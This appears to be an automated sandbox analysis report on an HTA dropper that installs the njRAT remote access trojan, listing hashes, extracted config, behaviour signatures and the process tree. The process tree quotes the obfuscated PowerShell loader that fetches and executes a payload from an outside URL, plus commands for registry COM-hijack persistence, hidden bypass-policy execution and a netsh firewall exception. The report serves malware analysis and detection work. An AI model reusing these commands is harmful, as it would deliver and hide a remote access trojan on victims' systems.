Analysis
max time kernel: 150s
max time network: 143s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-08-2022 19:13
Static task: static1
Behavioral task: behavioral1 (Sample: enc2.hta, Resource: win7-20220715-en)
Behavioral task: behavioral2 (Sample: enc2.hta, Resource: win10v2004-20220721-en)
Behavioral task: behavioral3 (Sample: enc3.hta, Resource: win7-20220718-en)
Behavioral task: behavioral4 (Sample: enc3.hta, Resource: win10v2004-20220721-en)
General
Target: enc2.hta
Size: 4KB
MD5: 655efe95aac234dbfca94dda9b36db0e
SHA1: ab7a01b4048afe8a31348d48647fbbf2a0579e3f
SHA256: bb4c9c960b921042233d6835d513e320e353a616d44c089dc96a7f4b686e759b
SHA512: 6928dd4d0201a3aec4e7d58da2d02e6a8bc4a3aa9e4b223e77f568ac094b752e5a18672124c1cc299870e6e81ce298d99017541f1d95cf64a229470dc998bd07
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: POWERSHELL.exe, POWERSHELL.exe
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4084 4848 POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2312 4848 POWERSHELL.exe
-
Blocklisted process makes network request 1 IoCs
Processes: POWERSHELL.exe
flow pid process
23 4084 POWERSHELL.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: reg.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description pid process target process
PID 4920 set thread context of 3492 4920 powershell.exe aspnet_compiler.exe
-
Modifies registry class 4 IoCs
Processes: reg.exe, reg.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid process
4084 POWERSHELL.exe
4084 POWERSHELL.exe
3580 powershell.exe
3580 powershell.exe
2312 POWERSHELL.exe
2312 POWERSHELL.exe
2312 POWERSHELL.exe
4920 powershell.exe
4920 powershell.exe
4920 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, cmd.exe, cmd.exe, powershell.exe, aspnet_compiler.exe
description pid process target process
PID 4084 wrote to memory of 3580 4084 POWERSHELL.exe powershell.exe
PID 4084 wrote to memory of 3580 4084 POWERSHELL.exe powershell.exe
PID 3580 wrote to memory of 5032 3580 powershell.exe WScript.exe
PID 3580 wrote to memory of 5032 3580 powershell.exe WScript.exe
PID 2312 wrote to memory of 2528 2312 POWERSHELL.exe cmd.exe
PID 2312 wrote to memory of 2528 2312 POWERSHELL.exe cmd.exe
PID 2528 wrote to memory of 4232 2528 cmd.exe reg.exe
PID 2528 wrote to memory of 4232 2528 cmd.exe reg.exe
PID 2528 wrote to memory of 5000 2528 cmd.exe reg.exe
PID 2528 wrote to memory of 5000 2528 cmd.exe reg.exe
PID 2528 wrote to memory of 636 2528 cmd.exe cmd.exe
PID 2528 wrote to memory of 636 2528 cmd.exe cmd.exe
PID 636 wrote to memory of 4920 636 cmd.exe powershell.exe
PID 636 wrote to memory of 4920 636 cmd.exe powershell.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe
PID 3492 wrote to memory of 1988 3492 aspnet_compiler.exe netsh.exe
PID 3492 wrote to memory of 1988 3492 aspnet_compiler.exe netsh.exe
PID 3492 wrote to memory of 1988 3492 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 
'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat 1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat"" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f 3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f 3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'" 4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 6⤵
- Modifies Windows Firewall
Downloads
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat
Filesize: 706B
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1
Filesize: 3KB
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs
Filesize: 1KB
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1
Filesize: 604KB
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize: 3KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B